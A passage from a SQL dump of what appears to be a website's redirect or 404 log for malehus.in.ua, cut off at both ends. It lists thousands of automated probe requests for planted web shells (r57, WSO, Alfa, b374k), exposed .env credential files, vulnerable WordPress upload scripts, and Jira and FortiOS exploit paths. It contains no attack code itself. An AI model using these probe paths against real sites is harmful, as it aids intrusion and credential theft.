05:14:56','0000-00-00 00:00:00',301),(38346,'https://malehus.in.ua/utchiha-gmwmiotj.php',NULL,'','',1,0,'2022-09-11 05:14:57','0000-00-00 00:00:00',301),(38347,'https://malehus.in.ua/wp-admin/zphxi.php',NULL,'','',1,0,'2022-09-11 05:14:58','0000-00-00 00:00:00',301),(38348,'https://malehus.in.ua/indo.php',NULL,'','',1,0,'2022-09-11 05:14:59','0000-00-00 00:00:00',301),(38349,'https://malehus.in.ua/wp-rvx.php',NULL,'','',1,0,'2022-09-11 05:15:00','0000-00-00 00:00:00',301),(38350,'https://malehus.in.ua/fkbqn.php',NULL,'','',1,0,'2022-09-11 05:15:01','0000-00-00 00:00:00',301),(38351,'https://malehus.in.ua/wp-admin/css/colors/coffee/image.php',NULL,'','',1,0,'2022-09-11 05:15:02','0000-00-00 00:00:00',301),(38352,'https://malehus.in.ua/wp-admin/css/gelay.php',NULL,'','',1,0,'2022-09-11 05:15:04','0000-00-00 00:00:00',301),(38353,'https://malehus.in.ua/wp-content/shell20211028.php',NULL,'','',1,0,'2022-09-11 05:15:06','0000-00-00 00:00:00',301),(38354,'https://malehus.in.ua/wp-content/68b4k.php?fox=mwryy',NULL,'','',1,0,'2022-09-11 05:15:07','0000-00-00 00:00:00',301),(38355,'https://malehus.in.ua/p7m94.php',NULL,'','',1,0,'2022-09-11 05:15:09','0000-00-00 00:00:00',301),(38356,'https://malehus.in.ua/wp-admin/maint/404.php',NULL,'','',1,0,'2022-09-11 05:15:10','0000-00-00 00:00:00',301),(38357,'https://malehus.in.ua/wp-admin/includes/langar.php',NULL,'','',1,0,'2022-09-11 05:15:11','0000-00-00 00:00:00',301),(38358,'https://malehus.in.ua/utchiha-rszo.php',NULL,'','',1,0,'2022-09-11 05:15:14','0000-00-00 00:00:00',301),(38359,'https://malehus.in.ua/wp-content/plugins/wp-freeform/black2llleaf.php',NULL,'','',1,0,'2022-09-11 05:15:15','0000-00-00 00:00:00',301),(38360,'https://malehus.in.ua/wp-admin/includes/utchiha-nrjd.php',NULL,'','',1,0,'2022-09-11 05:15:17','0000-00-00 00:00:00',301),(38361,'https://malehus.in.ua/tmp/admin.php',NULL,'','',1,0,'2022-09-11 05:15:20','0000-00-00 00:00:00',301),(38362,'https://malehus.in.ua/wp-includes/css/maro.php',NULL,'','',1,0,'2022-09-11 05:15:21','0000-00-00 00:00:00',301),(38363,'https://malehus.in.ua/utchiha-evl.php',NULL,'','',1,0,'2022-09-11 05:15:23','0000-00-00 00:00:00',301),(38364,'https://malehus.in.ua/uy7sw.php',NULL,'','',1,0,'2022-09-11 05:15:25','0000-00-00 00:00:00',301),(38365,'https://malehus.in.ua/utchiha-osexc.php',NULL,'','',1,0,'2022-09-11 05:15:27','0000-00-00 00:00:00',301),(38366,'https://malehus.in.ua/p1337.php',NULL,'','',1,0,'2022-09-11 05:15:27','0000-00-00 00:00:00',301),(38367,'https://malehus.in.ua/syrian_shell.php',NULL,'','',1,0,'2022-09-11 05:15:28','0000-00-00 00:00:00',301),(38368,'https://malehus.in.ua/wp-admin/7z346.php',NULL,'','',1,0,'2022-09-11 05:15:29','0000-00-00 00:00:00',301),(38369,'https://malehus.in.ua/angyw.php',NULL,'','',1,0,'2022-09-11 05:15:31','0000-00-00 00:00:00',301),(38370,'https://malehus.in.ua/wp-admin/includes/media-site.php',NULL,'','',1,0,'2022-09-11 05:15:32','0000-00-00 00:00:00',301),(38371,'https://malehus.in.ua/i3wfj.php',NULL,'','',1,0,'2022-09-11 05:15:33','0000-00-00 00:00:00',301),(38372,'https://malehus.in.ua/wp-1.php',NULL,'','',1,0,'2022-09-11 05:15:34','0000-00-00 00:00:00',301),(38373,'https://malehus.in.ua/snowwins.php',NULL,'','',1,0,'2022-09-11 05:15:37','0000-00-00 00:00:00',301),(38374,'https://malehus.in.ua/wp-content/free-fixed.php',NULL,'','',1,0,'2022-09-11 05:15:38','0000-00-00 00:00:00',301),(38375,'https://malehus.in.ua/djfksr4.php',NULL,'','',1,0,'2022-09-11 05:15:40','0000-00-00 00:00:00',301),(38376,'https://malehus.in.ua/administration/mini.php',NULL,'','',1,0,'2022-09-11 05:15:43','0000-00-00 00:00:00',301),(38377,'https://malehus.in.ua/u8r2c.php?bajatax=pzgc',NULL,'','',1,0,'2022-09-11 05:15:44','0000-00-00 00:00:00',301),(38378,'https://malehus.in.ua/cybernetic,v2,(bangladesh,cyber,army),shell.,php',NULL,'','',1,0,'2022-09-11 05:15:46','0000-00-00 00:00:00',301),(38379,'https://malehus.in.ua/icomsium.php',NULL,'','',1,0,'2022-09-11 05:15:47','0000-00-00 00:00:00',301),(38380,'https://malehus.in.ua/ico.php',NULL,'','',1,0,'2022-09-11 05:15:49','0000-00-00 00:00:00',301),(38381,'https://malehus.in.ua/mass.php',NULL,'','',1,0,'2022-09-11 05:15:53','0000-00-00 00:00:00',301),(38382,'https://malehus.in.ua/pws.php',NULL,'','',1,0,'2022-09-11 05:15:57','0000-00-00 00:00:00',301),(38383,'https://malehus.in.ua/r57.php',NULL,'','',1,0,'2022-09-11 05:16:02','0000-00-00 00:00:00',301),(38384,'https://malehus.in.ua/robots.php',NULL,'','',1,0,'2022-09-11 05:16:03','0000-00-00 00:00:00',301),(38385,'https://malehus.in.ua/shell.aspx',NULL,'','',1,0,'2022-09-11 05:16:04','0000-00-00 00:00:00',301),(38386,'https://malehus.in.ua/snd.php',NULL,'','',1,0,'2022-09-11 05:16:06','0000-00-00 00:00:00',301),(38387,'https://malehus.in.ua/wp-content/zjlt8q.php',NULL,'','',1,0,'2022-09-11 05:16:11','0000-00-00 00:00:00',301),(38388,'https://malehus.in.ua/wp-content/ws57kd.php',NULL,'','',1,0,'2022-09-11 05:16:13','0000-00-00 00:00:00',301),(38389,'https://malehus.in.ua/tmcj1r.php',NULL,'','',1,0,'2022-09-11 05:16:14','0000-00-00 00:00:00',301),(38390,'https://malehus.in.ua/wp-includes/css/e8sdn8.php',NULL,'','',1,0,'2022-09-11 05:16:16','0000-00-00 00:00:00',301),(38391,'https://malehus.in.ua/tmp/123.php',NULL,'','',1,0,'2022-09-11 05:16:17','0000-00-00 00:00:00',301),(38392,'https://malehus.in.ua/tmp/1.php',NULL,'','',1,0,'2022-09-11 05:16:18','0000-00-00 00:00:00',301),(38393,'https://malehus.in.ua/tmp/a.php',NULL,'','',1,0,'2022-09-11 05:16:20','0000-00-00 00:00:00',301),(38394,'https://malehus.in.ua/tmp/dz1.php',NULL,'','',1,0,'2022-09-11 05:16:21','0000-00-00 00:00:00',301),(38395,'https://malehus.in.ua/spy.aspxxd.php',NULL,'','',1,0,'2022-09-11 05:16:22','0000-00-00 00:00:00',301),(38396,'https://malehus.in.ua/tmp/xd.php',NULL,'','',1,0,'2022-09-11 05:16:23','0000-00-00 00:00:00',301),(38397,'https://malehus.in.ua/sym/root/home/billing/killer.php',NULL,'','',1,0,'2022-09-11 05:16:25','0000-00-00 00:00:00',301),(38398,'https://malehus.in.ua/tmp/upload.php',NULL,'','',1,0,'2022-09-11 05:16:26','0000-00-00 00:00:00',301),(38399,'https://malehus.in.ua/wp-admin/includes/a.php',NULL,'','',1,0,'2022-09-11 05:16:28','0000-00-00 00:00:00',301),(38400,'https://malehus.in.ua/wp-admin/maint/a.php',NULL,'','',1,0,'2022-09-11 05:16:29','0000-00-00 00:00:00',301),(38401,'https://malehus.in.ua/wp-admin/a.php',NULL,'','',1,0,'2022-09-11 05:16:31','0000-00-00 00:00:00',301),(38402,'https://malehus.in.ua/wp-admin/css/a.php',NULL,'','',1,0,'2022-09-11 05:16:33','0000-00-00 00:00:00',301),(38403,'https://malehus.in.ua/teslaxx.php',NULL,'','',1,0,'2022-09-11 05:16:34','0000-00-00 00:00:00',301),(38404,'https://malehus.in.ua/c0derz_shell.php',NULL,'','',1,0,'2022-09-11 05:16:36','0000-00-00 00:00:00',301),(38405,'https://malehus.in.ua/wp-includes/ixr/bnet.php',NULL,'','',1,0,'2022-09-11 05:16:37','0000-00-00 00:00:00',301),(38406,'https://malehus.in.ua/n2t00y42r6.php',NULL,'','',1,0,'2022-09-11 05:16:39','0000-00-00 00:00:00',301),(38407,'https://malehus.in.ua/tod.php',NULL,'','',1,0,'2022-09-11 05:16:40','0000-00-00 00:00:00',301),(38408,'https://malehus.in.ua/011526.php',NULL,'','',1,0,'2022-09-11 05:16:42','0000-00-00 00:00:00',301),(38409,'https://malehus.in.ua/backdoorshell.php',NULL,'','',1,0,'2022-09-11 05:16:42','0000-00-00 00:00:00',301),(38410,'https://malehus.in.ua/xoxox.php',NULL,'','',1,0,'2022-09-11 05:16:44','0000-00-00 00:00:00',301),(38411,'https://malehus.in.ua/l4nce.php',NULL,'','',1,0,'2022-09-11 05:16:46','0000-00-00 00:00:00',301),(38412,'https://malehus.in.ua/mini_b374k.php',NULL,'','',1,0,'2022-09-11 05:16:48','0000-00-00 00:00:00',301),(38413,'https://malehus.in.ua/4lin.php',NULL,'','',1,0,'2022-09-11 05:16:49','0000-00-00 00:00:00',301),(38414,'https://malehus.in.ua/n1chu.php',NULL,'','',1,0,'2022-09-11 05:16:51','0000-00-00 00:00:00',301),(38415,'https://malehus.in.ua/cgishell.pl',NULL,'','',1,0,'2022-09-11 05:16:52','0000-00-00 00:00:00',301),(38416,'https://malehus.in.ua/killer.php',NULL,'','',1,0,'2022-09-11 05:16:53','0000-00-00 00:00:00',301),(38417,'https://malehus.in.ua/forum.sqlr00t-s3c.php',NULL,'','',1,0,'2022-09-11 05:16:54','0000-00-00 00:00:00',301),(38418,'https://malehus.in.ua/tmp/vaga.php',NULL,'','',1,0,'2022-09-11 05:16:57','0000-00-00 00:00:00',301),(38419,'https://malehus.in.ua/tmp/killer.php',NULL,'','',1,0,'2022-09-11 05:16:58','0000-00-00 00:00:00',301),(38420,'https://malehus.in.ua/tmp/fucked.php',NULL,'','',1,0,'2022-09-11 05:17:02','0000-00-00 00:00:00',301),(38421,'https://malehus.in.ua/abuhlail.php',NULL,'','',1,0,'2022-09-11 05:17:02','0000-00-00 00:00:00',301),(38422,'https://malehus.in.ua/tmp/d0maine.php',NULL,'','',1,0,'2022-09-11 05:17:03','0000-00-00 00:00:00',301),(38423,'https://malehus.in.ua/tmp/sql.php',NULL,'','',1,0,'2022-09-11 05:17:04','0000-00-00 00:00:00',301),(38424,'https://malehus.in.ua/tmp/priv8.php',NULL,'','',1,0,'2022-09-11 05:17:06','0000-00-00 00:00:00',301),(38425,'https://malehus.in.ua/templates/ja-helio-farsi/index.php',NULL,'','',1,0,'2022-09-11 05:17:10','0000-00-00 00:00:00',301),(38426,'https://malehus.in.ua/wp-content/plugins/count-per-day/js/yc/d00.php',NULL,'','',1,0,'2022-09-11 05:17:12','0000-00-00 00:00:00',301),(38427,'https://malehus.in.ua/administration/sym.php',NULL,'','',1,0,'2022-09-11 05:17:13','0000-00-00 00:00:00',301),(38428,'https://malehus.in.ua/lock360.php',NULL,'','',1,0,'2022-09-11 05:17:17','0000-00-00 00:00:00',301),(38429,'https://malehus.in.ua/nice.php',NULL,'','',1,0,'2022-09-11 05:17:18','0000-00-00 00:00:00',301),(38430,'https://malehus.in.ua/wp-content/local.php',NULL,'','',1,0,'2022-09-11 05:17:19','0000-00-00 00:00:00',301),(38431,'https://malehus.in.ua/okay.php',NULL,'','',1,0,'2022-09-11 05:17:21','0000-00-00 00:00:00',301),(38432,'https://malehus.in.ua/wp-includes/css/wp.php',NULL,'','',1,0,'2022-09-11 05:17:32','0000-00-00 00:00:00',301),(38433,'https://malehus.in.ua/wp-includes/images/wp-blog.php',NULL,'','',1,0,'2022-09-11 05:17:38','0000-00-00 00:00:00',301),(38434,'https://malehus.in.ua/.tmb/cache/index.php',NULL,'','',1,0,'2022-09-11 05:17:41','0000-00-00 00:00:00',301),(38435,'https://malehus.in.ua/mt/pekok.php',NULL,'','',1,0,'2022-09-11 05:17:42','0000-00-00 00:00:00',301),(38436,'https://malehus.in.ua/wp-includes/css/xm.php',NULL,'','',1,0,'2022-09-11 05:17:45','0000-00-00 00:00:00',301),(38437,'https://malehus.in.ua/lufix.php',NULL,'','',1,0,'2022-09-11 05:17:48','0000-00-00 00:00:00',301),(38438,'https://malehus.in.ua/shell20220621.php',NULL,'','',1,0,'2022-09-11 05:17:56','0000-00-00 00:00:00',301),(38439,'https://malehus.in.ua/ninja.php',NULL,'','',2,0,'2022-09-11 05:17:57','0000-00-00 00:00:00',301),(38440,'https://malehus.in.ua/utchiha-wvib.php',NULL,'','',1,0,'2022-09-11 05:17:58','0000-00-00 00:00:00',301),(38441,'https://malehus.in.ua/alfacgiapi/rrlkp.php',NULL,'','',1,0,'2022-09-11 05:17:59','0000-00-00 00:00:00',301),(38442,'https://malehus.in.ua/alfa_data/alfacgiapi/shellgo.php',NULL,'','',1,0,'2022-09-11 05:18:01','0000-00-00 00:00:00',301),(38443,'https://malehus.in.ua/wp-admin/maint/poster.php',NULL,'','',1,0,'2022-09-11 05:18:02','0000-00-00 00:00:00',301),(38444,'https://malehus.in.ua/images/upload.php',NULL,'','',1,0,'2022-09-11 05:18:04','0000-00-00 00:00:00',301),(38445,'https://malehus.in.ua/gkn35v.php',NULL,'','',1,0,'2022-09-11 05:18:05','0000-00-00 00:00:00',301),(38446,'https://malehus.in.ua/utchiha-zwt.php',NULL,'','',1,0,'2022-09-11 05:18:06','0000-00-00 00:00:00',301),(38447,'https://malehus.in.ua/wp-includes/upl.php',NULL,'','',1,0,'2022-09-11 05:18:07','0000-00-00 00:00:00',301),(38448,'https://malehus.in.ua/wp-admin/includes/maro.php',NULL,'','',1,0,'2022-09-11 05:18:08','0000-00-00 00:00:00',301),(38449,'https://malehus.in.ua/wp-content/think.php',NULL,'','',1,0,'2022-09-11 05:18:09','0000-00-00 00:00:00',301),(38450,'https://malehus.in.ua/wp-admin/includes/404.php',NULL,'','',1,0,'2022-09-11 05:18:10','0000-00-00 00:00:00',301),(38451,'https://malehus.in.ua/codeboy1877_up.php',NULL,'','',1,0,'2022-09-11 05:18:11','0000-00-00 00:00:00',301),(38452,'https://malehus.in.ua/ogbqhlph.php',NULL,'','',1,0,'2022-09-11 05:18:14','0000-00-00 00:00:00',301),(38453,'https://malehus.in.ua/wp-content/foxs1sx.php',NULL,'','',1,0,'2022-09-11 05:18:15','0000-00-00 00:00:00',301),(38454,'https://malehus.in.ua/wp-content/rszaevfrhr.php',NULL,'','',1,0,'2022-09-11 05:18:17','0000-00-00 00:00:00',301),(38455,'https://malehus.in.ua/dsdfklsjroden.php',NULL,'','',1,0,'2022-09-11 05:18:21','0000-00-00 00:00:00',301),(38456,'https://malehus.in.ua/_.php',NULL,'','',1,0,'2022-09-11 05:18:22','0000-00-00 00:00:00',301),(38457,'https://malehus.in.ua/images/upl.php',NULL,'','',1,0,'2022-09-11 05:18:25','0000-00-00 00:00:00',301),(38458,'https://malehus.in.ua/wp-content/axv.php',NULL,'','',1,0,'2022-09-11 05:18:26','0000-00-00 00:00:00',301),(38459,'https://malehus.in.ua/f0x.php',NULL,'','',1,0,'2022-09-11 05:18:29','0000-00-00 00:00:00',301),(38460,'https://malehus.in.ua/wp-admin/includes/utchiha-smrweap.php',NULL,'','',1,0,'2022-09-11 05:18:32','0000-00-00 00:00:00',301),(38461,'https://malehus.in.ua/utchiha-iqgcivn.php',NULL,'','',1,0,'2022-09-11 05:18:35','0000-00-00 00:00:00',301),(38462,'https://malehus.in.ua/wp-admin/css/colors/coffee/shells.php',NULL,'','',1,0,'2022-09-11 05:18:35','0000-00-00 00:00:00',301),(38463,'https://malehus.in.ua/pvt.php',NULL,'','',1,0,'2022-09-11 05:18:37','0000-00-00 00:00:00',301),(38464,'https://malehus.in.ua/wp-admin/includes/about.php',NULL,'','',1,0,'2022-09-11 05:18:38','0000-00-00 00:00:00',301),(38465,'https://malehus.in.ua/utchiha-ftaoverq.php',NULL,'','',1,0,'2022-09-11 05:18:38','0000-00-00 00:00:00',301),(38466,'https://malehus.in.ua/wp-admin/css/upl.php',NULL,'','',1,0,'2022-09-11 05:18:39','0000-00-00 00:00:00',301),(38467,'https://malehus.in.ua/wp-includes/alfa_data/alfacgiapi/ho7cuy.php',NULL,'','',1,0,'2022-09-11 05:18:41','0000-00-00 00:00:00',301),(38468,'https://malehus.in.ua/wp-content/plugins/html404/xccc.php',NULL,'','',1,0,'2022-09-11 05:18:41','0000-00-00 00:00:00',301),(38469,'https://malehus.in.ua/qibozpiuqx.php',NULL,'','',1,0,'2022-09-11 05:18:43','0000-00-00 00:00:00',301),(38470,'https://malehus.in.ua/zudjr.php',NULL,'','',1,0,'2022-09-11 05:18:43','0000-00-00 00:00:00',301),(38471,'https://malehus.in.ua/exp.php',NULL,'','',1,0,'2022-09-11 05:18:45','0000-00-00 00:00:00',301),(38472,'https://malehus.in.ua/lok.php',NULL,'','',1,0,'2022-09-11 05:18:45','0000-00-00 00:00:00',301),(38473,'https://malehus.in.ua/wp-admin/57yke.php',NULL,'','',1,0,'2022-09-11 05:18:46','0000-00-00 00:00:00',301),(38474,'https://malehus.in.ua/utchiha-zmq.php',NULL,'','',1,0,'2022-09-11 05:18:47','0000-00-00 00:00:00',301),(38475,'https://malehus.in.ua/xinfo.php',NULL,'','',1,0,'2022-09-11 05:18:48','0000-00-00 00:00:00',301),(38476,'https://malehus.in.ua/wp-admin/2ua81.php',NULL,'','',1,0,'2022-09-11 05:18:49','0000-00-00 00:00:00',301),(38477,'https://malehus.in.ua/images/priv8.php',NULL,'','',1,0,'2022-09-11 05:18:50','0000-00-00 00:00:00',301),(38478,'https://malehus.in.ua/scjttmffwi.php',NULL,'','',1,0,'2022-09-11 05:18:51','0000-00-00 00:00:00',301),(38479,'https://malehus.in.ua/wp-content/1788821455_error_log.php',NULL,'','',1,0,'2022-09-11 05:18:53','0000-00-00 00:00:00',301),(38480,'https://malehus.in.ua/myshell.php',NULL,'','',1,0,'2022-09-11 05:18:56','0000-00-00 00:00:00',301),(38481,'https://malehus.in.ua/kanghoax.php',NULL,'','',1,0,'2022-09-11 05:18:57','0000-00-00 00:00:00',301),(38482,'https://malehus.in.ua/contentt.php',NULL,'','',1,0,'2022-09-11 05:18:58','0000-00-00 00:00:00',301),(38483,'https://malehus.in.ua/wp-content/themes/twentytwenty/404.php',NULL,'','',1,0,'2022-09-11 05:19:00','0000-00-00 00:00:00',301),(38484,'https://malehus.in.ua/useri.php',NULL,'','',1,0,'2022-09-11 05:19:02','0000-00-00 00:00:00',301),(38485,'https://malehus.in.ua/alfa_data/alfacgiapi/bavyn.php',NULL,'','',1,0,'2022-09-11 05:19:03','0000-00-00 00:00:00',301),(38486,'https://malehus.in.ua/crefgxje.php',NULL,'','',1,0,'2022-09-11 05:19:05','0000-00-00 00:00:00',301),(38487,'https://malehus.in.ua/yoi.php',NULL,'','',1,0,'2022-09-11 05:19:07','0000-00-00 00:00:00',301),(38488,'https://malehus.in.ua/bypass403.php',NULL,'','',1,0,'2022-09-11 05:19:09','0000-00-00 00:00:00',301),(38489,'https://malehus.in.ua/wp-content/alfa.php',NULL,'','',1,0,'2022-09-11 05:19:10','0000-00-00 00:00:00',301),(38490,'https://malehus.in.ua/wp-sid.php',NULL,'','',1,0,'2022-09-11 05:19:11','0000-00-00 00:00:00',301),(38491,'https://malehus.in.ua/alfa_data/alfacgiapi/mini.php',NULL,'','',1,0,'2022-09-11 05:19:11','0000-00-00 00:00:00',301),(38492,'https://malehus.in.ua/wp-includes/pomo/so.php',NULL,'','',1,0,'2022-09-11 05:19:13','0000-00-00 00:00:00',301),(38493,'https://malehus.in.ua/utchiha-vygkf.php',NULL,'','',1,0,'2022-09-11 05:19:14','0000-00-00 00:00:00',301),(38494,'https://malehus.in.ua/alfaindex.php',NULL,'','',1,0,'2022-09-11 05:19:15','0000-00-00 00:00:00',301),(38495,'https://malehus.in.ua/wp-admin/css/colors/coffee/up.php',NULL,'','',1,0,'2022-09-11 05:19:16','0000-00-00 00:00:00',301),(38496,'https://malehus.in.ua/administration/shell.php',NULL,'','',1,0,'2022-09-11 05:19:17','0000-00-00 00:00:00',301),(38497,'https://malehus.in.ua/jdimzmtaas.php',NULL,'','',1,0,'2022-09-11 05:19:18','0000-00-00 00:00:00',301),(38498,'https://malehus.in.ua/wp-content/uploads/2022/04/xxelfhgxih.php',NULL,'','',1,0,'2022-09-11 05:19:21','0000-00-00 00:00:00',301),(38499,'https://malehus.in.ua/ab.php',NULL,'','',1,0,'2022-09-11 05:19:22','0000-00-00 00:00:00',301),(38500,'https://malehus.in.ua/octeesfes.php',NULL,'','',1,0,'2022-09-11 05:19:24','0000-00-00 00:00:00',301),(38501,'https://malehus.in.ua/176.php',NULL,'','',1,0,'2022-09-11 05:19:25','0000-00-00 00:00:00',301),(38502,'https://malehus.in.ua/allahnaber.php',NULL,'','',1,0,'2022-09-11 05:19:26','0000-00-00 00:00:00',301),(38503,'https://malehus.in.ua/.tmb/cache/1.php',NULL,'','',1,0,'2022-09-11 05:19:28','0000-00-00 00:00:00',301),(38504,'https://malehus.in.ua/utchiha-reuwr.php',NULL,'','',1,0,'2022-09-11 05:19:29','0000-00-00 00:00:00',301),(38505,'https://malehus.in.ua/wp-admin/euz8q.php',NULL,'','',1,0,'2022-09-11 05:19:31','0000-00-00 00:00:00',301),(38506,'https://malehus.in.ua/makhdamxshell.php',NULL,'','',4,0,'2022-09-12 19:18:31','0000-00-00 00:00:00',301),(38507,'https://malehus.in.ua/0byte',NULL,'','',4,0,'2022-09-12 19:19:12','0000-00-00 00:00:00',301),(38508,'https://malehus.in.ua/blog/fw.php/',NULL,'','',1,0,'2022-09-12 19:21:18','0000-00-00 00:00:00',301),(38509,'https://malehus.in.ua/public/403.php',NULL,'','',8,0,'2022-09-12 19:23:33','0000-00-00 00:00:00',301),(38510,'https://malehus.in.ua/punisher.php',NULL,'','',1,0,'2022-09-12 19:23:35','0000-00-00 00:00:00',301),(38511,'https://malehus.in.ua/wp-admin/radio.php',NULL,'','',8,0,'2022-09-12 19:25:15','0000-00-00 00:00:00',301),(38512,'https://malehus.in.ua/wp-includes/991176.php',NULL,'','',8,0,'2022-09-12 19:26:05','0000-00-00 00:00:00',301),(38513,'https://malehus.in.ua/wp-includes/about.php',NULL,'','',8,0,'2022-09-12 19:26:07','0000-00-00 00:00:00',301),(38514,'https://malehus.in.ua/wp-includes/shell20211028.php',NULL,'','',12,0,'2022-09-12 19:26:11','0000-00-00 00:00:00',301),(38515,'https://malehus.in.ua/wp-content/plugins/super-forms/uploads/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-09-14 16:42:44','0000-00-00 00:00:00',301),(38516,'https://malehus.in.ua/wp-content/themes/squeezetheme/style.css',NULL,'','',1,0,'2022-09-16 06:03:01','0000-00-00 00:00:00',301),(38517,'https://malehus.in.ua/wp-content/themes/optimizepress/lib/admin/media-upload.php',NULL,'','',2,0,'2022-09-18 10:05:54','0000-00-00 00:00:00',301),(38518,'https://www.malehus.in.ua/fr-dii fr-fin',NULL,'','',2,0,'2022-09-20 23:58:45','0000-00-00 00:00:00',301),(38519,'https://malehus.in.ua/wp-content/themes/konzept/includes/uploadify/upload.php',NULL,'','',1,0,'2022-09-21 07:09:48','0000-00-00 00:00:00',301),(38520,'https://malehus.in.ua/wp-content/themes/konzept/style.css',NULL,'','',1,0,'2022-09-22 16:20:46','0000-00-00 00:00:00',301),(38521,'https://malehus.in.ua/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',7,0,'2022-09-23 06:20:10','0000-00-00 00:00:00',301),(38522,'https://malehus.in.ua/wp-content/themes/qualifire/style.css',NULL,'','',1,0,'2022-09-24 06:24:15','0000-00-00 00:00:00',301),(38523,'https://malehus.in.ua/upl.php',NULL,'','',1,0,'2022-09-24 12:14:51','0000-00-00 00:00:00',301),(38524,'https://malehus.in.ua/wp-content/themes/famous/megaframe/megapanel/inc/functions.php',NULL,'','',2,0,'2022-09-25 18:48:26','0000-00-00 00:00:00',301),(38525,'https://malehus.in.ua/wp-content/themes/deep-blue/megaframe/megapanel/inc/functions.php',NULL,'','',1,0,'2022-09-28 18:16:33','0000-00-00 00:00:00',301),(38526,'https://malehus.in.ua/wp-admin/includes/',NULL,'','',1,0,'2022-10-01 15:13:09','0000-00-00 00:00:00',301),(38527,'https://malehus.in.ua/installer-backup.php',NULL,'http://malehus.in.ua/installer-backup.php','',1,0,'2022-10-03 15:47:04','0000-00-00 00:00:00',301),(38528,'https://malehus.in.ua/wordpress/installer.php',NULL,'http://malehus.in.ua/wordpress/installer.php','',1,0,'2022-10-03 15:47:04','0000-00-00 00:00:00',301),(38529,'https://malehus.in.ua/wp-content/mu-plugins-old/index.php?f=/bmluxzleairiek7s/umvusxn4hvg3bzrf.txt',NULL,'','',3,0,'2022-10-05 08:42:04','0000-00-00 00:00:00',301),(38530,'https://malehus.in.ua/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.css',NULL,'','',2,0,'2022-10-07 15:17:36','0000-00-00 00:00:00',301),(38531,'https://malehus.in.ua/wp-content/themes/seotheme/db.php?u',NULL,'','',11,0,'2022-10-08 15:56:37','0000-00-00 00:00:00',301),(38532,'https://malehus.in.ua/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.css',NULL,'','',3,0,'2022-10-09 05:35:39','0000-00-00 00:00:00',301),(38533,'https://malehus.in.ua/temp/',NULL,'','',2,0,'2022-10-09 23:18:14','0000-00-00 00:00:00',301),(38534,'https://malehus.in.ua/oholoshennia/8-novini-2/2543-bezpechne-misto-malin',NULL,'','',1,0,'2022-10-12 06:16:39','0000-00-00 00:00:00',301),(38535,'https://malehus.in.ua/sessions/.env',NULL,'','',3,0,'2022-10-13 12:31:52','0000-00-00 00:00:00',301),(38536,'https://malehus.in.ua/laravel/public/.env',NULL,'','',3,0,'2022-10-13 12:31:54','0000-00-00 00:00:00',301),(38537,'https://malehus.in.ua/env/example/.env',NULL,'','',1,0,'2022-10-13 12:31:55','0000-00-00 00:00:00',301),(38538,'https://malehus.in.ua/wp-content/themes/theagency/includes/uploadify/uploadify.css',NULL,'','',1,0,'2022-10-13 13:11:14','0000-00-00 00:00:00',301),(38539,'https://www.malehus.in.ua/core/.env',NULL,'','',12,0,'2022-10-14 20:20:28','0000-00-00 00:00:00',301),(38540,'https://malehus.in.ua/wp-content/themes/holding_pattern/admin/options-tab-sample.txt',NULL,'','',1,0,'2022-10-18 04:19:02','0000-00-00 00:00:00',301),(38541,'https://malehus.in.ua/wp-content/themes/satoshi/styles/functions.css',NULL,'','',1,0,'2022-10-19 15:18:02','0000-00-00 00:00:00',301),(38542,'https://malehus.in.ua/front/.env',NULL,'','',2,0,'2022-10-27 03:26:05','0000-00-00 00:00:00',301),(38543,'https://malehus.in.ua/back/.env',NULL,'','',2,0,'2022-10-27 03:26:41','0000-00-00 00:00:00',301),(38544,'https://malehus.in.ua/makhdamx.php',NULL,'','',12,0,'2022-10-31 08:57:32','0000-00-00 00:00:00',301),(38545,'https://malehus.in.ua/xltavrat.php',NULL,'','',8,0,'2022-10-31 08:58:35','0000-00-00 00:00:00',301),(38546,'https://malehus.in.ua/holuby/poshtovi/8-novini-2/2543-bezpechne-misto-malin',NULL,'','',1,0,'2022-11-02 02:11:53','0000-00-00 00:00:00',301),(38547,'https://malehus.in.ua/holuby/kinhy/8-novini-2/2543-bezpechne-misto-malin',NULL,'','',1,0,'2022-11-02 04:31:06','0000-00-00 00:00:00',301),(38548,'https://malehus.in.ua/index.php/rizni-porady/8-novini-2/2436-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-7-misyatsiv-2020-roku',NULL,'','',3,0,'2022-11-02 05:00:30','0000-00-00 00:00:00',301),(38549,'https://malehus.in.ua/ruzookgs.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-11-16 15:56:05','0000-00-00 00:00:00',301),(38550,'https://www.malehus.in.ua/s/5353e253e23313e2538313/_/;/meta-inf/maven/com.atlassian.jira/jira-webapp-dist/pom.properties',NULL,'','',2,0,'2022-11-20 08:26:37','0000-00-00 00:00:00',301),(38551,'https://www.malehus.in.ua/api/v2/cmdb/system/admin/admin',NULL,'','',1,0,'2022-11-20 08:26:37','0000-00-00 00:00:00',301),(38552,'https://malehus.in.ua/s/5353e253e23313e2538313/_/;/meta-inf/maven/com.atlassian.jira/jira-webapp-dist/pom.properties',NULL,'','',2,0,'2022-11-20 08:26:38','0000-00-00 00:00:00',301),(38553,'https://malehus.in.ua/api/v2/cmdb/system/admin/admin',NULL,'','',1,0,'2022-11-20 08:26:38','0000-00-00 00:00:00',301),(38554,'https://www.malehus.in.ua/rizni-porady/8-novini-2/2543-bezpechne-misto-malin',NULL,'','',2,0,'2022-11-21 03:11:26','0000-00-00 00:00:00',301),(38555,'https://malehus.in.ua/wp-content/plugins/sid/sidwso.php',NULL,'www.google.com','',2,0,'2022-11-21 08:33:48','0000-00-00 00:00:00',301),(38556,'https://malehus.in.ua/edit.php',NULL,'www.google.com','',2,0,'2022-11-21 08:34:21','0000-00-00 00:00:00',301),(38557,'https://malehus.in.ua/xle.php',NULL,'www.google.com','',2,0,'2022-11-21 08:36:03','0000-00-00 00:00:00',301),(38558,'https://malehus.in.ua/r00t.php',NULL,'www.google.com','',2,0,'2022-11-21 08:42:02','0000-00-00 00:00:00',301),(38559,'https://malehus.in.ua/wp-content/themes/seotheme/db.php',NULL,'www.google.com','',11,0,'2022-11-21 08:43:44','0000-00-00 00:00:00',301),(38560,'https://malehus.in.ua/class.php',NULL,'www.google.com','',2,0,'2022-11-21 08:45:21','0000-00-00 00:00:00',301),(38561,'https://malehus.in.ua/wso112233.php',NULL,'www.google.com','',6,0,'2022-11-21 08:49:06','0000-00-00 